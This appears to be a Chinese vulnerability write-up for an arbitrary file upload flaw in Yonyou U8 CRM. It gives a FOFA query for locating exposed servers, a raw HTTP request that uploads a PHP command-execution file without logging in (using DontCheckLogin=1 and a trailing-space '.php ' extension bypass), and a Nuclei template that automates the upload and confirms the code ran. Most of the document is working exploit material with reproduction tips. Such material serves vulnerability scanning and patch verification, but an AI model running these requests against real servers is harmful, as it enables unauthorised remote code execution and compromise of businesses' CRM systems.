Fofa语法
title="用友U8CRM"（注意：下文 Nuclei 模板 metadata 中使用的是 app="用友U8CRM"，title 与 app 并非同一检索字段，两者命中的资产范围不同，使用前请自行核对以哪一个为准。）
漏洞POC（说明：下面的请求在页面提取时丢失了空行——HTTP 头与请求体之间、以及每个 multipart 段的头与内容之间各需要一个空行，复现时须补回；filename 末尾 ".php " 的空格是绕过后缀校验的一部分，请勿让编辑器自动去掉；payload 中的 unlink(__FILE__) 用于执行后自删除，避免在目标上遗留 webshell；Host 请替换为目标地址。）
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="1.php "
Content-Type: application/octet-stream
<?php system("whoami");unlink(__FILE__);?>
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--
Nuclei
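id: yonyou-crm-arbitrary-file-upload

info:
  name: Yonyou CRM - Arbitrary File Upload
  author: HK
  severity: high
  description: 用友CRM系统的uploadfile.php接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件。
  metadata:
    # Two raw requests per target: the upload and the verification GET.
    max-request: 2
    # NOTE(review): the accompanying write-up fingerprints with title="用友U8CRM";
    # app= and title= are different FOFA fields — confirm which one is intended.
    fofa-query: app="用友U8CRM"
  tags: yonyou,crm,fileupload

http:
  - raw:
      # Request 1: unauthenticated upload (DontCheckLogin=1 skips the login
      # check) of a self-deleting PHP probe. The trailing space after ".php"
      # in the filename is deliberate — it is part of the extension-check
      # bypass — so do not let an editor strip trailing whitespace here.
      # The blank line after the last header and after each multipart part's
      # headers is required by HTTP/multipart framing and must stay.
      # {{randstr}} replaces the leftover "%s" placeholder with a random
      # basename; the server renames the file anyway (see the extractor).
      - |
        POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt

        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php "
        Content-Type: application/octet-stream

        <?php print(1111*2222);unlink(__FILE__);?>
        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
        Content-Disposition: form-data; name="upload"

        upload
        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

      # Request 2: fetch the stored file under the name the server assigned
      # (taken from response 1) to confirm the PHP actually executed.
      - |
        GET /tmpfile/{{uploadfile}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      # The server stores the upload as upd<...>.tmp.php and echoes that
      # name in the upload response; capture it for the second request.
      - type: regex
        name: uploadfile
        part: body
        group: 1
        internal: true
        regex:
          - '(upd\w+\.tmp\.php)'

    matchers-condition: and
    matchers:
      # 1111*2222 = 2468642: only present if PHP ran, not if the source was
      # merely stored or reflected.
      - type: word
        part: body
        words:
          - '2468642'
      - type: status
        status:
          - 200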